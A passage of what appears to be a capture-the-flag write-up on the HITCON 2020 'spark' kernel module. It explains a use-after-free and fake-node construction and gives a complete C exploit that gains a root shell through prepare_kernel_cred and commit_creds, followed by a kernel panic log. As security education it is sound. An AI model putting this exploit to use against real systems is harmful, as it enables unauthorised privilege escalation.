searching path is done by <code>query</code>.</p> <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v5.9.11/source"><code>5.9.11</code></a> <ul> <li>No SMAP</li> <li>No SMEP</li> <li>No KPTI</li> </ul> </li> </ul> <h3 id="module">Module</h3> <p>The source code of module is not provided, but the challenge gives us the demo program using it.</p> <div class="collapsable-code"> <input id="516873924" type="checkbox" checked /> <label for="516873924"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">HITCON2020-spark-demo.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>/* * This is a demo program to show how to interact with SPARK. * Don&#39;t waste time on finding bugs here ;) * * Copyright (c) 2020 david942j */ #include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/spark.h&gt; #include &lt;stdio.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;unistd.h&gt; #define DEV_PATH &#34;/dev/node&#34; #define N 6 static int fd[N]; const char l[] = &#34;ABCDEF&#34;; /* B -- 10 -- D -- 11 -- F / \ | 4 | | / | | A 5 4 \ | | 2 | | \ | | C -- 3 - E */ static void link(int a, int b, unsigned int weight) { printf(&#34;Creating link between &#39;%c&#39; and &#39;%c&#39; with weight %u\n&#34;, l[a], l[b], weight); assert(ioctl(fd[a], SPARK_LINK, fd[b] | ((unsigned long long)weight &lt;&lt; 32)) == 0); } static void query(int a, int b) { struct spark_ioctl_query qry = { .fd1 = fd[a], .fd2 = fd[b], }; assert(ioctl(fd[0], SPARK_QUERY, &amp;qry) == 0); printf(&#34;The length of shortest path between &#39;%c&#39; and &#39;%c&#39; is %lld\n&#34;, l[a], l[b], qry.distance); } int main(int argc, char *argv[]) { for (int i = 0; i &lt; N; i++) { fd[i] = open(DEV_PATH, O_RDONLY); assert(fd[i] &gt;= 0); } link(0, 1, 4); link(0, 2, 2); link(1, 2, 5); link(1, 3, 10); link(2, 4, 3); link(3, 4, 4); link(3, 5, 11); assert(ioctl(fd[0], SPARK_FINALIZE) == 0); query(0, 5); query(3, 2); query(2, 5); for (int i = 0; i &lt; N; i++) close(fd[i]); return 0; } </code></pre></div> <p>As we can see in <code>demo.c</code>, this module is for a shortest path search. And each node can be allocated by <code>open</code> and two nodes can be linked by <code>link</code>. The searching path is done by <code>query</code>.</p> <p>I think these are all knowlege which we can know from <code>demo.c</code>. So I do reserving <code>spark.ko</code>. The module has 4 features: link, finalize, query, get_info.</p> <h3 id="vulnerability">Vulnerability</h3> <p>The vulnerability is in <code>spark_node_put</code>. When we <code>close</code> the node and if the reference count is one, <code>free</code> the node itself and its double linked list nodes. But when <code>free</code> the node, the node in other node (which is linked with the closed node) is not freed.</p> <p>For example, we allocate 2 nodes(node A and node B) via <code>open</code> and link them. The node A&rsquo;s fd and bk has the pointer to node B. And of course, node B has the pointer to node A in fd and bk. After linking, if we <code>close</code> node B, the node B is free-ed but the pointer in node A is not deleted.</p> <p>The fd and bk in each node are used in <code>spark_node_finalize</code> and <code>spark_graph_query</code>.</p> <h2 id="exploit">Exploit</h2> <h3 id="trigger-uaf">Trigger UAF</h3> <p>As I explained in above, the UAF can be caused by following code:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">int</span> fds[<span style="color:#ae81ff">2</span>]; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> <span style="color:#66d9ef">sizeof</span>(fds) <span style="color:#f92672">/</span> <span style="color:#ae81ff">4</span>; <span style="color:#f92672">++</span>i) { </span></span><span style="display:flex;"><span> fds[i] <span style="color:#f92672">=</span> <span style="color:#a6e22e">open</span>(VULN_DEV_NAME, O_RDONLY); </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span><span style="color:#a6e22e">vuln_dev_link</span>(fds[<span style="color:#ae81ff">0</span>], fds[<span style="color:#ae81ff">1</span>], <span style="color:#ae81ff">0</span>); </span></span><span style="display:flex;"><span><span style="color:#a6e22e">close</span>(fds[<span style="color:#ae81ff">1</span>]); </span></span></code></pre></div><h3 id="build-fake-node">Build fake node</h3> <p>The structure of node and linked list node is like:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_link_t</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_link_t</span><span style="color:#f92672">*</span> bk; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_link_t</span><span style="color:#f92672">*</span> fd; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_node_t</span><span style="color:#f92672">*</span> target; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> weight; </span></span><span style="display:flex;"><span>} <span style="color:#66d9ef">spark_link_t</span>; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_node_t</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> idx; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> ref_cnt; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> __padding_0; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> start_lock[<span style="color:#ae81ff">32</span>]; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> is_finalized; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint32_t</span> __padding_1; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> nb_lock[<span style="color:#ae81ff">32</span>]; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> link_cnt; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_link_t</span><span style="color:#f92672">*</span> bk; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">spark_link_t</span><span style="color:#f92672">*</span> fd; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> idx_in_table; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">spark_node_table_t</span><span style="color:#f92672">*</span> node_table; </span></span><span style="display:flex;"><span>} <span style="color:#66d9ef">spark_node_t</span>; </span></span></code></pre></div><p>And the invalid values in <code>spark_node_t</code> may cause crash. And with several tries I found if <code>start_lock</code> is zeros and bk and fd is correctly set, crash does not occurs.</p> <p>So, I try finding proper object which can control UAF object and I decide to use <a href="https://elixir.bootlin.com/linux/v5.9.11/source/ipc/msgutil.c#L37"><code>struct msg_msgseg</code></a>. It allocated by user-defined length and user&rsquo;s data. And the best thing is it can be fully controlled by user!! (except first 8 bytes). Because the first 8 bytes of <code>spark_node_t</code> is index of each node, it can be set any value.</p> <p>Now we can control the UAF node by <code>struct msg_msgseg</code>.</p> <h4 id="prevent-crash-while-finalize">Prevent crash while finalize</h4> <p>By using <code>struct msg_msgseg</code> and set <code>start_lock</code> with zeros, the crash in <code>mutex_lock</code> can be prevented. But there is the traversal mechanism which travel the linked nodes in <code>traversal</code>. The traversal ends when <code>&amp;node-&gt;bk == cur_node-&gt;bk</code>.</p> <p>Since we does not know the address of node, we cannot stop the traversal and this occurs the crash&hellip;. However differ my expectation, the crash does not reboot the OS and print kernel&rsquo;s registers! Morever in the kernel&rsquo;s registers there is the address of UAF node (R13).</p> <p>With this observation, I crash the kernel several times and the address of UAF node may not be changed. So I think I can use it.</p> <p>After one crashing, I set bk and fd with the value of R13+0x60 (this is R12 of panic information) and execute the program, no crash occurs in <code>traversal</code>.</p> <h3 id="make-invalid-node-table-by-finalize">Make invalid node table by finalize</h3> <p>The <code>spark_node_finalize</code> function makes the node table and set each linked node&rsquo;s index in the table. For example, the graph is following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plaintext" data-lang="plaintext"><span style="display:flex;"><span> B -- 10 -- D </span></span><span style="display:flex;"><span> / \ </span></span><span style="display:flex;"><span> 4 | </span></span><span style="display:flex;"><span> / | </span></span><span style="display:flex;"><span>A 5 </span></span><span style="display:flex;"><span> \ | </span></span><span style="display:flex;"><span> 2 | </span></span><span style="display:flex;"><span> \ | </span></span><span style="display:flex;"><span> C -- 3 - E </span></span></code></pre></div><p>And if we request finalize on node A, the A&rsquo;s <code>node_table</code> and <code>idx_in_table</code> of each nodes are set by following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plaintext" data-lang="plaintext"><span style="display:flex;"><span>0: A (its `idx_in_table` is 0) </span></span><span style="display:flex;"><span>1: C (its `idx_in_table` is 1) </span></span><span style="display:flex;"><span>2: E (its `idx_in_table` is 2) </span></span><span style="display:flex;"><span>3: B (its `idx_in_table` is 3) </span></span><span style="display:flex;"><span>4: D (its `idx_in_table` is 4) </span></span></code></pre></div><p>The <code>node_table</code> and <code>idx_in_table</code> is used in <code>spark_graph_query</code> (And in this function, 8 bytes OOB write can be triggered, explained in later).</p> <p>Since the environment of this challenge is No-SMAP and No-SMEP and we can controll fd and bk of UAF node, we can insert fake nodes (defined in user-land) to linked list. So for the OOB write I set fake nodes to build <code>node_table</code> like following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plaintext" data-lang="plaintext"><span style="display:flex;"><span>0: A </span></span><span style="display:flex;"><span>1: UAF node </span></span><span style="display:flex;"><span>2: Fake user-land node </span></span><span style="display:flex;"><span>3: Fake user-land node </span></span></code></pre></div><h3 id="trigger-oob-write">Trigger OOB write</h3> <p>In <code>spark_graph_query</code> function, there is a following routine:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">// ... </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>temp_dists <span style="color:#f92672">=</span> (<span style="color:#66d9ef">__int64</span> <span style="color:#f92672">*</span>)<span style="color:#a6e22e">_kmalloc</span>(<span style="color:#ae81ff">8</span> <span style="color:#f92672">*</span> node_table<span style="color:#f92672">-&gt;</span>size, _GFP_IO <span style="color:#f92672">|</span> ___GFP_FS <span style="color:#f92672">|</span> ___GFP_DIRECT_RECLAIM <span style="color:#f92672">|</span> ___GFP_KSWAPD_RECLAIM); </span></span><span style="display:flex;"><span><span style="color:#75715e">// ... </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>bk <span style="color:#f92672">=</span> cur_node<span style="color:#f92672">-&gt;</span>bk; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> ( end <span style="color:#f92672">=</span> <span style="color:#f92672">&amp;</span>cur_node<span style="color:#f92672">-&gt;</span>bk; bk <span style="color:#f92672">!=</span> (<span style="color:#66d9ef">spark_link_t</span> <span style="color:#f92672">*</span>)end; bk <span style="color:#f92672">=</span> bk<span style="color:#f92672">-&gt;</span>bk ) </span></span><span style="display:flex;"><span>{ </span></span><span style="display:flex;"><span> p_upated_dist <span style="color:#f92672">=</span> <span style="color:#f92672">&amp;</span>temp_dists[bk<span style="color:#f92672">-&gt;</span>target<span style="color:#f92672">-&gt;</span>idx_in_table]; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> ( <span style="color:#f92672">*</span>p_upated_dist <span style="color:#f92672">!=</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span> ) </span></span><span style="display:flex;"><span> { </span></span><span style="display:flex;"><span> dist_of_this_path <span style="color:#f92672">=</span> dist_to_cur <span style="color:#f92672">+</span> bk<span style="color:#f92672">-&gt;</span>weight; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> ( <span style="color:#f92672">*</span>p_upated_dist <span style="color:#f92672">&gt;</span> dist_of_this_path ) </span></span><span style="display:flex;"><span> <span style="color:#f92672">*</span>p_upated_dist <span style="color:#f92672">=</span> dist_of_this_path; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span><span style="color:#75715e">// ... </span></span></span></code></pre></div><p>Because our target (and its idx_in_table) of <code>node_table</code> can be controlld by us, we can write <code>temp_dists</code> with arbitrary index by setting <code>idx_in_table</code>. Furthermore since the weigth of bk node can be controlled by user, we can get arbitrary 8 bytes OOB write.</p> <h3 id="rip-control">RIP control</h3> <p>Since the <code>size</code> of <code>node_bale</code> is 4 and then the <code>kamlloc</code> allocate 32 bytes chunk, I decide to use <a href="https://elixir.bootlin.com/linux/v5.9.11/source/include/linux/seq_file.h#L31"><code>struct seq_operations</code></a> to control RIP.</p> <p>We can run user-mode code via RIP control because SMEP is not enabled.</p> <h3 id="exploit-code">Exploit code</h3> <div class="collapsable-code"> <input id="984153267" type="checkbox" checked /> <label for="984153267"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">HITCON2020-spark-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;linux/keyctl.h&gt; #include &lt;stdarg.h&gt; #include &lt;stddef.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/ipc.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/msg.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;syscall.h&gt; #include &lt;unistd.h&gt; static void get_enter_to_continue(const char* msg); static void fatal(const char* msg); static void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } static void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } struct msgbuf { long mtype; /* message type, must be &gt; 0 */ char mtext[1]; /* message data */ }; int send_msg(int msgqid, char* data, size_t size, long mtype); int recv_msg(int msgqid, char* data, size_t size, long mtype); int send_msg(int msgqid, char* data, size_t size, long mtype) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; memcpy(m-&gt;mtext, data, size); m-&gt;mtype = mtype; ret = msgsnd(msgqid, m, size, 0); free(m); return ret; } int recv_msg(int msgqid, char* data, size_t size, long mtype) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; m-&gt;mtype = mtype; ret = msgrcv(msgqid, m, size, mtype, 0); memcpy(data, m-&gt;mtext, size); free(m); return ret; } #define VULN_DEV_NAME &#34;/dev/node&#34; #define VULN_DEV_CMD_LINK 0x4008D900 #define VULN_DEV_CMD_FINALIZE 0xD902 #define VULN_DEV_CMD_QUERY 0xC010D903 #define VULN_DEV_CMD_GET_INFO 0x8018D901 typedef struct query_t { int fd1; int fd2; int64_t distance; } query_t; typedef struct node_info_t { uint64_t link_cnt; uint64_t idx_in_weights; uint64_t weights_size; } node_info_t; typedef struct spark_link_t { struct spark_link_t* bk; struct spark_link_t* fd; struct spark_node_t* target; uint64_t weight; } spark_link_t; typedef struct spark_node_table_t { uint64_t size; uint64_t capacity; struct spark_node_t** nodes; } spark_node_table_t; typedef struct spark_node_t { uint64_t idx; uint32_t ref_cnt; uint32_t __padding_0; char start_lock[32]; uint32_t is_finalized; uint32_t __padding_1; char nb_lock[32]; uint64_t link_cnt; struct spark_link_t* bk; struct spark_link_t* fd; uint64_t idx_in_table; spark_node_table_t* node_table; } spark_node_t; static int vuln_dev_link(int fd1, int fd2, int weight); static int vuln_dev_finalize(int fd); static int64_t vuln_dev_query(int fd, int fd1, int fd2); static node_info_t vuln_dev_get_info(int fd); static int vuln_dev_link(int fd1, int fd2, int weight) { return ioctl(fd1, VULN_DEV_CMD_LINK, (uint64_t)fd2 | ((uint64_t)weight &lt;&lt; 32)); } static int vuln_dev_finalize(int fd) { return ioctl(fd, VULN_DEV_CMD_FINALIZE); } static int64_t vuln_dev_query(int fd, int fd1, int fd2) { query_t qry = {.fd1 = fd1, .fd2 = fd2, .distance = -1}; if (ioctl(fd, VULN_DEV_CMD_QUERY, &amp;qry)) { return -1; } return qry.distance; } static node_info_t vuln_dev_get_info(int fd) { node_info_t info; ioctl(fd, VULN_DEV_CMD_GET_INFO, &amp;info); return info; } uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); } static void get_shell() { puts(&#34;[+] Get shell!&#34;); char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; execve(&#34;/bin/sh&#34;, argv, envp); } static void restore_state() { asm volatile( &#34;swapgs;\n&#34; &#34;mov qword ptr [rsp+0x20], %[u_ss];\n&#34; &#34;mov qword ptr [rsp+0x18], %[u_sp];\n&#34; &#34;mov qword ptr [rsp+0x10], %[u_rflags];\n&#34; &#34;mov qword ptr [rsp+0x08], %[u_cs];\n&#34; &#34;mov qword ptr [rsp+0x00], %[u_ret];\n&#34; &#34;iretq;\n&#34; ::[u_cs] &#34;r&#34;(user_cs), [u_ss] &#34;r&#34;(user_ss), [u_sp] &#34;r&#34;(user_sp), [u_rflags] &#34;r&#34;(user_rflags), [u_ret] &#34;r&#34;(get_shell)); } __attribute__((naked)) static void get_root_shell() { asm volatile( &#34;mov rax, [rsp];\n&#34; &#34;sub rax, 0x3185d4;\n&#34; // rax will be kernel_base &#34;mov r15, rax;\n&#34; // r15 will be kernel_base // Call prepare_kernel_cred &#34;xor rdi, rdi;\n&#34; &#34;add rax, 0xbe9c0;\n&#34; // rax will be prepare_kernel_cred &#34;call rax;\n&#34; // Call commit_creds &#34;mov rdi, rax;\n&#34; &#34;mov rax, r15;\n&#34; &#34;add rax, 0xbe550;\n&#34; // rax will be commit_creds &#34;call rax;\n&#34; : : : &#34;rax&#34;, &#34;rdi&#34;, &#34;r15&#34;, &#34;memory&#34;); restore_state(); } int main(int argc, char* argv[]) { save_state(); int fds[2]; puts(&#34;[*] Alloc 2 nodes&#34;); for (int i = 0; i &lt; sizeof(fds) / 4; ++i) { fds[i] = open(VULN_DEV_NAME, O_RDONLY); } puts(&#34;[*] Link 2 nodes&#34;); vuln_dev_link(fds[0], fds[1], 0); puts(&#34;[*] Trigger UAF and build fake node and fake link&#34;); close(fds[1]); char* msg_mem = malloc(0x2000); memset(msg_mem, &#39;a&#39;, 0x2000); memset(msg_mem + 0x1000 - 48, 0, 0x1000 + 48); char* fake_mem = malloc(0x1000); memset(fake_mem, 0, 0x1000); spark_node_t* fake_node_1 = (spark_node_t*)fake_mem; spark_node_t* fake_node_2 = (spark_node_t*)(fake_mem + sizeof(spark_node_t)); spark_link_t* fake_link_1 = (spark_link_t*)(fake_mem + 2 * sizeof(spark_node_t)); spark_link_t* fake_link_2 = (spark_link_t*)(fake_mem + 2 * sizeof(spark_node_t) + sizeof(spark_link_t)); spark_link_t* fake_link_3 = (spark_link_t*)(fake_mem + 2 * sizeof(spark_node_t) + 2 * sizeof(spark_link_t)); spark_node_t* uaf_fake_node_data = (spark_node_t*)(msg_mem + 0x1000 - 48 - 8); printf( &#34;[*] fake_node_1: %p, fake_link_1: %p, fake_node_2: %p, fake_link_2: &#34; &#34;%p\n&#34;, fake_node_1, fake_link_1, fake_node_2, fake_link_2); if (argc == 2) { uint64_t uaf_fake_node_addr = strtoull(argv[1], NULL, 16); // R12(==R13+0x60) of panic uaf_fake_node_data-&gt;ref_cnt = 3; uaf_fake_node_data-&gt;idx_in_table = 0xdeadbeef; uaf_fake_node_data-&gt;bk = (spark_link_t*)fake_link_1; uaf_fake_node_data-&gt;fd = (spark_link_t*)fake_link_2; fake_link_1-&gt;target = fake_node_1; fake_link_1-&gt;bk = (spark_link_t*)fake_link_2; fake_link_1-&gt;fd = (spark_link_t*)uaf_fake_node_addr; fake_link_2-&gt;target = fake_node_2; fake_link_2-&gt;bk = (spark_link_t*)uaf_fake_node_addr; fake_link_2-&gt;fd = (spark_link_t*)fake_node_1; fake_node_1-&gt;idx = 0xdeadbeef; fake_node_1-&gt;ref_cnt = 3; fake_node_1-&gt;is_finalized = 0; fake_node_1-&gt;bk = (spark_link_t*)&amp;fake_node_1-&gt;bk; fake_node_1-&gt;fd = (spark_link_t*)&amp;fake_node_1; fake_node_2-&gt;idx = 0xcafebebe; fake_node_2-&gt;ref_cnt = 3; fake_node_2-&gt;is_finalized = 0; fake_node_2-&gt;bk = (spark_link_t*)&amp;fake_node_2-&gt;bk; fake_node_2-&gt;fd = (spark_link_t*)&amp;fake_node_2; } else { uaf_fake_node_data-&gt;ref_cnt = 1; } send_msg(1, msg_mem, 0x1000 - 48 + 0x80 - 8, 1); puts(&#34;[*] Put fake node to node_tables&#34;); vuln_dev_finalize(fds[0]); puts(&#34;[*] Modify nodes...&#34;); fake_node_1-&gt;bk = (spark_link_t*)fake_link_3; fake_node_1-&gt;fd = (spark_link_t*)fake_link_3; fake_link_3-&gt;bk = (spark_link_t*)&amp;fake_node_1-&gt;bk; fake_link_3-&gt;fd = (spark_link_t*)&amp;fake_node_1-&gt;bk; fake_link_3-&gt;target = fake_node_2; fake_link_3-&gt;weight = (uint64_t)get_root_shell; fake_node_2-&gt;idx_in_table = 4; puts(&#34;[*] Spraying seq_ops...&#34;); int seq_ops_spray[100]; for (int i = 0; i &lt; sizeof(seq_ops_spray) / 4; ++i) { seq_ops_spray[i] = open(&#34;/proc/self/stat&#34;, O_RDONLY); } close(seq_ops_spray[0]); if (fake_node_1-&gt;idx_in_table != 0) { puts(&#34;[+] Success to build fake node&#34;); } else { puts(&#34;[-] Failed to build fake node&#34;); return -1; } int new_nodes[4]; for (int i = 0; i &lt; sizeof(new_nodes) / 4; ++i) { new_nodes[i] = open(VULN_DEV_NAME, O_RDONLY); if (i != 0) { vuln_dev_link(new_nodes[i - 1], new_nodes[i], 0x100 + i); } } vuln_dev_finalize(new_nodes[3]); puts(&#34;[*] Trigger OOB and overwrite seq_ops&#34;); vuln_dev_query(fds[0], new_nodes[1], new_nodes[0]); puts(&#34;[*] ACE!!&#34;); for (int i = 0; i &lt; sizeof(seq_ops_spray) / 4; ++i) { char buf[1]; read(seq_ops_spray[i], buf, 1); } memset(fake_mem, 0, 0x1000); return 0; }</code></pre></div> <p>To get a root shell, we need to execute the exploit program twice:</p> <ol> <li>Run the program without any arguments.</li> <li>Run the program with value of kernel&rsquo;s R12 register shown by kernel panic.</li> </ol> <p>For example, after executing this program without any arguments, the kernel panic occurs and its information is printed as following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plaintext" data-lang="plaintext"><span style="display:flex;"><span>[ 60.936674] BUG: kernel NULL pointer dereference, address: 0000000000000010 </span></span><span style="display:flex;"><span>[ 60.937311] #PF: supervisor read access in kernel mode </span></span><span style="display:flex;"><span>[ 60.937974] #PF: error_code(0x0000) - not-present page </span></span><span style="display:flex;"><span>[ 60.938416] PGD de07067 P4D de07067 PUD de06067 PMD 0 </span></span><span style="display:flex;"><span>[ 60.939092] Oops: 0000 [#1] SMP NOPTI </span></span><span style="display:flex;"><span>[ 60.939439] CPU: 0 PID: 123 Comm: exploit Tainted: G E 5.9.11 #1 </span></span><span style="display:flex;"><span>[ 60.939824] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 </span></span><span style="display:flex;"><span>[ 60.940679] RIP: 0010:traversal+0x52/0x110 [spark] </span></span><span style="display:flex;"><span>[ 60.941182] Code: c0 75 77 48 8d 50 01 49 89 16 49 89 44 24 70 49 8b 36 49 3b 76 08 0f 84 81 00 00 00 49 8b 5c 24 60 49 83 c4 60 0 </span></span><span style="display:flex;"><span>[ 60.942692] RSP: 0018:ffffc900001d7e10 EFLAGS: 00000207 </span></span><span style="display:flex;"><span>[ 60.943401] RAX: ffff88800ddcaf20 RBX: 0000000000000000 RCX: 00000000000008d3 </span></span><span style="display:flex;"><span>[ 60.943929] RDX: 00000000000008d2 RSI: c1f7a9928c6ca877 RDI: 0000000000031060 </span></span><span style="display:flex;"><span>[ 60.944350] RBP: ffffc900001d7e38 R08: ffffc900001d7d98 R09: 0000000000000000 </span></span><span style="display:flex;"><span>[ 60.944940] R10: 0000000000000000 R11: 0000000000000000 R12: ffff88800dd4fb60 </span></span><span style="display:flex;"><span>[ 60.945509] R13: ffff88800dd4fb00 R14: ffff88800ddcaf80 R15: ffff88800dd4fb10 </span></span><span style="display:flex;"><span>[ 60.946147] FS: 0000000001787380(0000) GS:ffff88800f600000(0000) knlGS:0000000000000000 </span></span><span style="display:flex;"><span>[ 60.946744] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 </span></span><span style="display:flex;"><span>[ 60.947116] CR2: 0000000000000010 CR3: 000000000de04000 CR4: 00000000000006f0 </span></span><span style="display:flex;"><span>[ 60.947932] Call Trace: </span></span><span style="display:flex;"><span>[ 60.948909] traversal+0xa0/0x110 [spark] </span></span><span style="display:flex;"><span>[ 60.949412] spark_node_finalize+0x83/0xb0 [spark] </span></span><span style="display:flex;"><span>[ 60.949769] node_ioctl+0x136/0x250 [spark] </span></span><span style="display:flex;"><span>[ 60.949977] ? tomoyo_file_ioctl+0x19/0x20 </span></span><span style="display:flex;"><span>[ 60.950249] __x64_sys_ioctl+0x96/0xd0 </span></span><span style="display:flex;"><span>[ 60.950477] do_syscall_64+0x37/0x80 </span></span><span style="display:flex;"><span>[ 60.950819] entry_SYSCALL_64_after_hwframe+0x44/0xa9 </span></span><span style="display:flex;"><span>[ 60.951459] RIP: 0033:0x423d3d </span></span><span style="display:flex;"><span>[ 60.951794] Code: 04 25 28 00 00 00 48 89 45 c8 31 c0 48 8d 45 10 c7 45 b0 10 00 00 00 48 89 45 b8 48 8d 45 d0 48 89 45 c0 b8 10 0 </span></span><span style="display:flex;"><span>[ 60.953022] RSP: 002b:00007fff9334fb60 EFLAGS: 00000246 ORIG_RAX: 0000000000000010 </span></span><span style="display:flex;"><span>[ 60.953536] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 0000000000423d3d </span></span><span style="display:flex;"><span>[ 60.954020] RDX: 0000000000000000 RSI: 000000000000d902 RDI: 0000000000000003 </span></span><span style="display:flex;"><span>[ 60.954957] RBP: 00007fff9334fbb0 R08: 0000000000000001 R09: 0000000000000000 </span></span><span style="display:flex;"><span>[ 60.955548] R10: 0000000000000000 R11: 0000000000000246 R12: 00007fff9334ff18 </span></span><span style="display:flex;"><span>[ 60.956501] R13: 00007fff9334ff28 R14: 00000000004ae868 R15: 0000000000000001 </span></span><span style="display:flex;"><span>[ 60.957217] Modules linked in: spark(E) </span></span><span style="display:flex;"><span>[ 60.957834] CR2: 0000000000000010 </span></span><span style="display:flex;"><span>[ 60.958602] ---[ end trace c0dd566a19a98686 ]--- </span></span><span style="display:flex;"><span>[ 60.958973] RIP: 0010:traversal+0x52/0x110 [spark] </span></span><span style="display:flex;"><span>[ 60.959299] Code: c0 75 77 48 8d 50 01 49 89 16 49 89 44 24 70 49 8b 36 49 3b 76 08 0f 84 81 00 00 00 49 8b 5c 24 60 49 83 c4 60 0 </span></span><span style="display:flex;"><span>[ 60.960089] RSP: 0018:ffffc900001d7e10 EFLAGS: 00000207 </span></span><span style="display:flex;"><span>[ 60.960471] RAX: ffff88800ddcaf20 RBX: 0000000000000000 RCX: 00000000000008d3 </span></span><span style="display:flex;"><span>[ 60.961083] RDX: 00000000000008d2 RSI: c1f7a9928c6ca877 RDI: 0000000000031060 </span></span><span style="display:flex;"><span>[ 60.961918] RBP: ffffc900001d7e38 R08: ffffc900001d7d98 R09: 0000000000000000 </span></span><span style="display:flex;"><span>[ 60.962316] R10: 0000000000000000 R11: 0000000000000000 R12: ffff88800dd4fb60 </span></span><span style="display:flex;"><span>[ 60.962646] R13: ffff88800dd4fb00 R14: ffff88800ddcaf80 R15: ffff88800dd4fb10 </span></span><span style="display:flex;"><span>[ 60.963020] FS: 0000000001787380(0000) GS:ffff88800f600000(0000) knlGS:0000000000000000 </span></span><span style="display:flex;"><span>[ 60.963489] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 </span></span><span style="display:flex;"><span>[ 60.963832] CR2: 0000000000000010 CR3: 000000000de04000 CR4: 00000000000006f0 </span></span><span style="display:flex;"><span>Killed </span></span></code></pre></div><p>Then, execute the program with <code>ffff88800dd4fb60</code> (its R12 value of printed panic information).</p> <h2 id="reference">Reference</h2> <ul> 